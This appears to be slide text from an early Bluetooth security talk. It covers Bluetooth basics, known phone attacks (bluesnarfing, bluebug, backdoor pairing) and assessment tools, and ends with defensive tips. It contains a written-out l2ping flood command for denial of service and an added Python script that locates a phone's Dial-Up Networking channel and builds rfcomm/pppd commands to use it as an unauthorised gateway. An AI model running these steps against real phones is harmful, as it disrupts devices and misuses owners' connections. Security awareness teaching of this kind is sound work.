bluetooth [in]security [2]
“0wned a mobile phone via bluetooth” -- y3dips
y3dips http://y3dips.echo.or.id
Who am I
● yet another “Hacker” wannabe
● founder of echo.or.id & Ubuntulinux.or.id
● focusing on Hacking & Security since 2002
● http://google.com/search?q=y3dips
Overview
● Point of views
● Proof 0f Concept
● Survive
● Discussion
Point 0f Views
History
● The name Bluetooth is derived from the 10th century king of Denmark, Harald Bluetooth.
● Early 1998 - Special Interest Group formed
– Code name Bluetooth
– Promoter Companies: Ericsson, IBM, Intel, Nokia, and Toshiba
● May 20, 1998 - Bluetooth publicly announced
● July 26, 1999 - Bluetooth 1.0 Specification Release
● Today - Bluetooth 2.0 work is ongoing
-- bluetooth.com, wikipedia.org
Bluetooth ? (1)
“Bluetooth wireless technology is a short-range communications technology intended to replace the cables connecting portable and/or fixed devices while maintaining high levels of security. The key features of Bluetooth technology are robustness, low power, and low cost.”
-- bluetooth.com
Bluetooth ? (2)
● Wireless
● Short-range communication
● A cable replacement technology
● Low power
● Low cost
● Hooks together all the devices
Technical Details
● 2.4 GHz ISM Open Band
– Globally available licence-free frequency band
– 79 MHz of spectrum = 79 channels of 1 MHz each
– Frequency Hopping & Time Division Duplex (1600 hops/second)
● 1-100 Meter Range, depending on the power class
– Class I: 100 mW, about 100 meters (300 feet)
– Class II: 2.5 mW, about 10 meters (30 feet)
– Class III: 1 mW, about 1 meter (3 feet)
– these are nominal figures for the device's own transmitter; an attacker with a directional antenna is not bound by them (see “Range isn't a real problem” below)
● a typical phone uses 2.5 mW of power (Class II)
● 1 Mbps Gross Rate
● Simultaneous Voice/Data Capable
Core protocol
Around Us (1)
Around Us (2)
Bluetooth mode
● On
– discoverable
– non-discoverable (the device no longer answers inquiry scans, but it still answers anyone who already knows or brute-forces its address, e.g. with redfang)
● Automatic
● Off
Security Mode
● Security Mode 1: non-secure (the device never initiates authentication or encryption)
● Security Mode 2: service level enforced security (the L2CAP channel comes up first, then each service decides whether it requires authentication/encryption)
● Security Mode 3: link level enforced security (authentication is required before the link is established at all)
Known Threat
● bluejacking -- “send unsolicited messages” (an anonymous OBEX push of a vCard or note; a nuisance rather than data theft)
● bluesmack -- “you may call it a denial of service of the device” (oversized L2CAP echo requests, see the l2ping slide below)
● bluesnarfing -- “read the phonebook, read messages, get the device info” (pulling the phone's data over OBEX without the phone asking for pairing)
● bluebug -- “execute AT commands, full access (read/write)” (an RFCOMM channel that accepts AT commands without pairing: calls, SMS, phonebook, forwarding)
● backdoor attack -- “abuse of an old pairing” (a device that was once paired keeps its trust relationship even after it no longer shows in the phone's list of paired devices)
Bluetooth pairing happens when two Bluetooth-enabled devices agree to communicate with one another. When this happens, the two devices join what is called a trusted pair and share a link key. When one device recognizes another device in an established trusted pair, each device automatically accepts communication, skipping the PIN entry and user confirmation that otherwise happen when Bluetooth devices first interact; the stored link key is used to authenticate instead. That silent acceptance is exactly what the backdoor attack relies on.
Are We Vulnerable ?
Are We Vulnerable ?
-- thebunker.net
Proof Of Concept
o\/\/n3d
Preparation (0)
● Oh my .. we need some basics at least
– first of all, sorry, I'm doing it on Linux, so go get a Linux distribution.
– have a Bluetooth device (a USB dongle or built-in adapter)
– install BlueZ from bluez.org (don't worry, newer kernels already include it for you)
– read the rest of this paper .... :p
Preparation (1)● Knowing your device
Preparation (2)● Knowing your device
Preparation (3)
● Define the PIN used for pairing (needed for the backdoor attack)
● Wait for the incoming (pairing) request and note the address
Preparation (4)
● have your own armory
– default (hcitool, sdptool)
– bluesnarfer
– bluescanner
– bluediving
– bt_audit
– redfang
– btxml
-- http://google.com/search?q=bluetooth+assessment+tools
0wned (0)
● reading device info
0wned (1)
● Reading “private” data
0wned (2)
● Deleting “private” data
0wned (3)
● Executing some “AT” commands (eg. make a phone call)
0wned (4)
● Denial of service of the target
set the echo request data size to something large and keep sending (bluesmack): l2ping -s <data size> <target address> (add -f to flood). The target's stack has to process every oversized L2CAP echo request, and a weak stack locks up or reboots.
Next 0wned (0)
● Detecting & footprinting the target
Next 0wned (1)
● Target as an internet gateway (backdoor attack)
-- finding DUN (Dial-Up Networking) support with sdptool browse, and noting the RFCOMM channel it is served on
Next 0wned (2)
● Target as an internet gateway (backdoor attack)
-- binding the address and channel to an rfcomm device and dialling out through it with pppd
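Added example for the two slides above (not code from the talk, and not y3dips's tooling): it parses the output of `sdptool browse`, locates the Dial-Up Networking service by its service class UUID (0x1103) rather than by the free-text service name, and builds the `rfcomm bind` / `pppd` steps for that channel. The sdptool output is a constructed sample in the format BlueZ's sdptool prints; the address 00:11:22:33:44:55, the dial string and the chat script are assumptions.

```python
"""Find the DUN service in `sdptool browse` output and derive the
rfcomm/pppd steps that use it.  Nothing here talks to a radio: the
sdptool output is a constructed sample, not a real capture."""
import re

# Service class UUID16 values from the Bluetooth assigned numbers.
DUN_UUID = 0x1103    # Dial-up Networking
OPUSH_UUID = 0x1105  # OBEX Object Push

# Constructed sample of `sdptool browse 00:11:22:33:44:55` (not a real phone).
SAMPLE_SDP = """\
Browsing 00:11:22:33:44:55 ...
Service Name: OBEX Object Push
Service RecHandle: 0x10000
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
  "Dialup Networking" (0x1103)
  "Generic Networking" (0x1201)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
Profile Descriptor List:
  "Dialup Networking" (0x1103)
    Version: 0x0100
"""


def parse_sdp_records(text):
    """Split sdptool output into records: name, service class UUIDs, RFCOMM channel.

    Records are separated by blank lines; section headers sit at column 0 and
    end with ':'; the entries below them are indented."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                      # blank line ends the current record
            rec, section = None, None
            continue
        if line.startswith("Browsing "):  # banner printed before the first record
            continue
        if rec is None:
            rec = {"name": None, "classes": [], "channel": None}
            records.append(rec)
        if line.startswith("Service Name:"):
            rec["name"] = line.split(":", 1)[1].strip()
        elif not raw.startswith((" ", "\t")) and line.endswith(":"):
            section = line[:-1]           # e.g. "Service Class ID List"
        elif section == "Service Class ID List":
            m = re.search(r"\(0x([0-9a-fA-F]{4})\)", line)
            if m:
                rec["classes"].append(int(m.group(1), 16))
        elif section == "Protocol Descriptor List":
            m = re.match(r"Channel:\s*(\d+)$", line)
            if m:
                rec["channel"] = int(m.group(1))
    return records


def find_rfcomm_channel(records, class_uuid):
    """RFCOMM channel of the first record advertising class_uuid, or None.

    Matching on the UUID, not on 'Service Name', matters: the name is vendor
    free text ("Dial-up Networking", "Dialup Networking", localised strings)."""
    for rec in records:
        if class_uuid in rec["classes"] and rec["channel"] is not None:
            return rec["channel"]
    return None


def gateway_commands(bdaddr, channel, dev=0, dial="*99#"):
    """The BlueZ/pppd steps for Next 0wned (2), returned as strings only.

    The dial string and chat script are assumptions for a GPRS phone; they
    are not taken from the talk."""
    return [
        f"rfcomm bind {dev} {bdaddr} {channel}",
        f"pppd /dev/rfcomm{dev} 115200 connect \"chat -v '' ATZ OK ATD{dial} CONNECT\" "
        "noauth defaultroute usepeerdns",
    ]


if __name__ == "__main__":
    recs = parse_sdp_records(SAMPLE_SDP)
    ch = find_rfcomm_channel(recs, DUN_UUID)
    print("DUN on RFCOMM channel", ch)
    for cmd in gateway_commands("00:11:22:33:44:55", ch):
        print(cmd)
```

The rfcomm/pppd step only goes through if the phone accepts the RFCOMM connection on that channel; on a phone that still holds a link key for the attacker's adapter from an earlier pairing, that acceptance is silent, which is the backdoor the slides describe. On a phone that has really unpaired, the connection triggers a fresh PIN prompt instead.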
Next 0wned (3)
● Range isn't a real problem
– the “bluesniper” rifle developed by John Hering and his colleagues at Flexilis can pick up Bluetooth devices from a mile away (a directional antenna on the attacker's side, so the victim's own power class does not limit the distance)
-- http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/
Next 0wned (4)
● No need for a non-mobile device
“Blooover” is a proof-of-concept tool that is intended to run on J2ME-enabled cell phones that appear to be comparably seamless.
Until now, attackers needed laptops for the snarfing of other people's information.
-- http://trifinite.org/trifinite_stuff_blooover.html
Survive
● turn off the service when you are not using it
● make your device non-discoverable (hides it from casual scans, though not from an address brute-force)
● update the firmware (snarf and bug holes are firmware bugs; the vendors ship fixes)
● use a strong PIN for pairing, and pair somewhere private
● unpair unused devices (this is what closes the backdoor)
● use antivirus (updated) and a firewall
● reject unknown messages and connection requests
Discussion